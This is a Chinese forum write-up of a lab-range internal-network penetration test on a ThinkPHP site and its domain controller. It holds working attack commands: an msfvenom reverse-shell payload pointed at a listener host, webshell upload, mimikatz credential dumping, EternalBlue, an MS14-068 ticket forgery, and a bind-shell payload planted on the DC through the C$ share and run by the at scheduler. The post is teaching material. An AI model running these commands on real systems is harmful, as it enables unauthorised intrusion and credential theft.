安全矩阵

 找回密码
 立即注册
搜索
查看: 908|回复: 0

记一次内网靶场渗透测试

[复制链接]

252

主题

252

帖子

1309

积分

金牌会员

Rank: 6Rank: 6

积分
1309
发表于 2022-10-14 23:15:36 | 显示全部楼层 |阅读模式
原文链接:记一次内网靶场渗透测试


准备工作
  1. (一)测试过程
  2. (二)检测过程
  3. (三)域渗透过程
  4. (四)总结
复制代码


程序员写在文章前:
最近,程序员小星在研究内网渗透,对部分内网靶场进行了测试,所以想和大家从测试过程、检测过程以及域渗透过程这3个方面来分享一下我在打内网靶场中的经历。
准备工作
本次内网网络拓扑图如下所示,首先将WEB的IP 192.168.0.150改为192.168.0.3。
编辑
(一)测试过程
信息收集:
1. 对目标IP进行端口扫描。
  1. <code class="hljs">sudo nmap -sS --open -Pn -p- -v 192.168.0.3</code>
复制代码


编辑
2.绑定hosts 192.168.0.3 www.webhack123.com ,访问网站首页出现一个thinkphp框架。
编辑
3.对网站进行目录扫描。
编辑
4.存在wc.db将其下载下来,使用工具打开,里面存在网站目录文件信息,查看网站目录信息后,可以了解网站的基本架构。
编辑
(二)检测过程
1. 通过前面的信息搜集,已经知道当前网站是thinkphp框架了,使用工具扫描一下常见的漏洞,发现存在日志泄漏。
编辑
2.在日志中泄漏了账号和密码的密文。
  1. <code>账号:admin</code><code>
  2. 密文:74c774ef39b5b977c1fd59dbfc73c3e380a65aa3</code>
复制代码


编辑
3.通过解密获取密码明文web123。
编辑
4.前面对网站进行目录扫描,未发现网站管理后台,因此使用脚本来绑定 hosts 碰撞管理后台的子域名。
编辑
5. admin.webhack123.com就是网站的管理后台。
编辑
6.使用前面获取的管理员账号密码进行登录,可以测试发现验证码是存在缺陷,也可以使用大字典来爆破出管理员的密码。
编辑
7.进入网站后台,修改允许上传的类型,上传一句话木马。
编辑
8.使用蚁剑连接获取webshell。
编辑
9. 在当前主机先进行简单的信息搜集,当前用户为administrator且主机未安装杀软,存在双网卡192.168.0.0/24 10.10.10.0/24,存在域环境。
生成攻击载荷先上线msf:
  1. <code class="hljs">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=9999  -f exe>haha.exe</code>
复制代码


编辑
10.迁移进程获取明文密码。
migrate
600load
kiwicreds_all11.获取登录过当前主机的用户信息。

12. 可以看到存在hackbox域的域用户web,本地管理员Administrator的密码为:!@#Qwe456
前面我们已经知道存在域环境,现在定位到域控为:
  1. <code class="hljs">dc.hackbox.com 10.10.10.149。</code>
复制代码


(三)域渗透过程
1. 前面知道该主机存在两个网卡,现在来对这两个网段的存活主机进行扫描,首先添加:
  1. <code>run autoroute -s 10.10.10.0/24
  2. </code><code>run autoroute -p</code>
复制代码

2. 对内网存活主机进行扫描,只存在10.10.10.149,也就是域控,且开放了445端口。
编辑
3.使用永恒之蓝试打,检测出存在永恒之蓝漏洞。
编辑
4. 反向shell失败原因未明,正向的shell是可以成功返回一个meterpreter,成功获取域控dc权限。
编辑
5. 测试使用MS14-068漏洞:使用这个 exp 需要一个普通域控用户, web 是域用户,但不知道密码。前面获取到用户Administrator的密码为!@#Qwe456,现尝试使用用户web和这个密码进行登录。
编辑
6.登录失败,但是密码应该是正确的,只是不是远程组。
编辑
7. #创建票据
  1. <code>ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456
  2. </code><code>Load kiwi</code><code>
  3. #清理票据
  4. </code><code>kerberos_ticket_purge</code>
复制代码


编辑
8.上传 mimikatz 注入票据 mimikatz # kerberos::ptc TGT_web@hackbox.com.ccache
编辑
9.查看票据 klist。
编辑
10.成功访问dc域控。
11.现在来获取域控权限,生成一个正向的载荷:
  1. <code>msfvenom -p windows/meterpreter/bind_tcp  LPORT=9998  -f exe>bind.exe</code>
  2. <code>
  3. copy命令复制到域控copy bind.exe \\dc\c$。</code>
复制代码


12. at命令执行计划任务运行bind.exe
  1. <code>net time \\dc
  2. </code><code>at \\dc 1:29:00 c:/bind.ex</code>
复制代码


13.成功获取域控权限。
编辑
14.迁移进程抓取明文密码。
编辑
15.至此已经拿下了域控的权限。
编辑
16.迁移到域管理员进程查看三个flag。
编辑
(四)总结
小星通过此次内网靶场测试的研究,加深了对内网系统的认识,熟练掌握了如何使用MSF完成整个打靶过程。下期,小星将使用Cobalstrick来完成打靶并以“黄金票据的利用”为题开展研究。声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 10:52 , Processed in 0.014360 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表